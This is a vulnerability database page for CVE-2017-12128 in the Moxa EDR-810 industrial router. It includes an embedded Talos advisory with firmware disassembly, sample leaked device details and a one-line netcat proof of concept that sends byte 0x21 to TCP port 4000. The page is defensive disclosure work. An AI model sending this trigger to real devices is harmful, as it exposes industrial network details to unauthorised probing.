Vulnerabilities > CVE-2017-12128 - Information Exposure vulnerability in Moxa Edr-810 Firmware 4.1

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
NONE
Availability impact
NONE
network
low complexity
moxa
CWE-200

Summary

An exploitable information disclosure vulnerability exists in the Server Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted TCP packet can cause information disclosure. An attacker can send a crafted TCP packet to trigger this vulnerability.

Vulnerable Configurations

Part Description Count
OS
Moxa
1
Hardware
Moxa
1

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Subverting Environment Variable Values
    The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.
  • Footprinting
    An attacker engages in probing and exploration activity to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.
  • Exploiting Trust in Client (aka Make the Client Invisible)
    An attack of this type exploits a programs' vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
  • Browser Fingerprinting
    An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.
  • Session Credential Falsification through Prediction
    This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.

Seebug

bulletinFamilyexploit
description### Summary An exploitable information disclosure vulnerability exists in the Server Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted TCP packet can cause information disclosure. An attacker can send a crafted TCP packet to trigger this vulnerability. ### Tested Versions Moxa EDR-810 V4.1 build 17030317 ### Product URLs https://www.moxa.com/product/EDR-810.htm ### CVSSv3 Score 5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N ### CWE CWE-213 - Intentional Information Exposure ### Details If 0x21 is set to the device over TCP/4000 the device will reply with: ``` !..Model EDR-810-VPN-2GSFP Name Firewall/VPN Router 05470 Serial No 1324 Firmware Ver. V3.13 build 16051215. Location Device Location -------------------------------------------------- LAN Address 192.168.127.254 Netmask 255.255.255.0 Gateway 0.0.0.0 MAC Address 00-90-E8-00-01-02 ``` When the server detects 0x21 it calls the "DoShowInfo" function. This function first gathers system info, then sends it back to the client. ``` LDR R2, =aSS_0 ; "%s\t%s\n" SUB R1, R11, #-s SUB R3, R11, #-var_128 MOV R0, R1 ; s MOV R1, R2 ; format LDR R2, =aModel ; "Model" BL sprintf ... LDR R2, =aSS_0 ; "%s\t%s\n" SUB R1, R11, #-s SUB R3, R11, #-var_640 SUB R3, R3, #0xC SUB R3, R3, #8 MOV R0, R1 ; s MOV R1, R2 ; format LDR R2, =aName ; "Name" BL sprintf ... LDR R2, =aSD_0 ; "%s\t%d\n" SUB R3, R11, #-var_12 LDRB R1, [R3] LDRB R3, [R3,#1] ORR R3, R1, R3,LSL#8 SUB R1, R11, #-s MOV R0, R1 ; s MOV R1, R2 ; format LDR R2, =aSerialNo ; "Serial No" ... LDR R2, =aSSS ; "%s\t%s %s\n" SUB R1, R11, #-s SUB R3, R11, #-var_128 SUB R0, R11, #-var_170 STR R0, [SP,#0x9A4+var_9A4] MOV R0, R1 ; s MOV R1, R2 ; format LDR R2, =aFirmwareVer_ ; "Firmware Ver." ... LDR R2, =aSS_0 ; "%s\t%s\n" SUB R1, R11, #-s SUB R3, R11, #-var_640 SUB R3, R3, #0xC SUB R3, R3, #8 ADD R3, R3, #0x29 MOV R0, R1 ; s MOV R1, R2 ; format LDR R2, =aLocation ; "Location" ... BL Get_IF_IP_MASK SUB R3, R11, #-var_970 SUB R3, R3, #0xC SUB R3, R3, #4 SUB R2, R11, #-var_130 MOV R0, R3 MOV R1, R2 BL Get_IF_MAC ... BL net_data_send ``` ### Exploit Proof-of-Concept In order to trigger the information disclosure vulnerability send 0x21 to the device over TCP/4000. ``` echo -ne '\x21' | nc 127.0.0.1 4000 ``` ### Timeline * 2017-11-15 - Vendor Disclosure * 2017-11-19 - Vendor Acknowledged * 2017-12-25 - Vendor provided timeline for fix (Feb 2018) * 2018-01-04 - Timeline pushed to mid-March per vendor * 2018-03-24 - Talos follow up with vendor for release timeline * 2018-03-26 - Timeline pushed to 4/13/18 per vendor * 2018-04-12 - Vendor patched & published new firmware on website * 2018-04-13 - Public Release
idSSV:97230
last seen2018-06-26
modified2018-04-16
published2018-04-16
reporterMy Seebug
sourcehttps://www.seebug.org/vuldb/ssvid-97230
titleMoxa EDR-810 Server Agent Information Disclosure Vulnerability(CVE-2017-12128)

Talos

idTALOS-2017-0480
last seen2019-05-29
published2018-04-13
reporterTalos Intelligence
sourcehttp://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0480
titleMoxa EDR-810 Server Agent Information Disclosure Vulnerability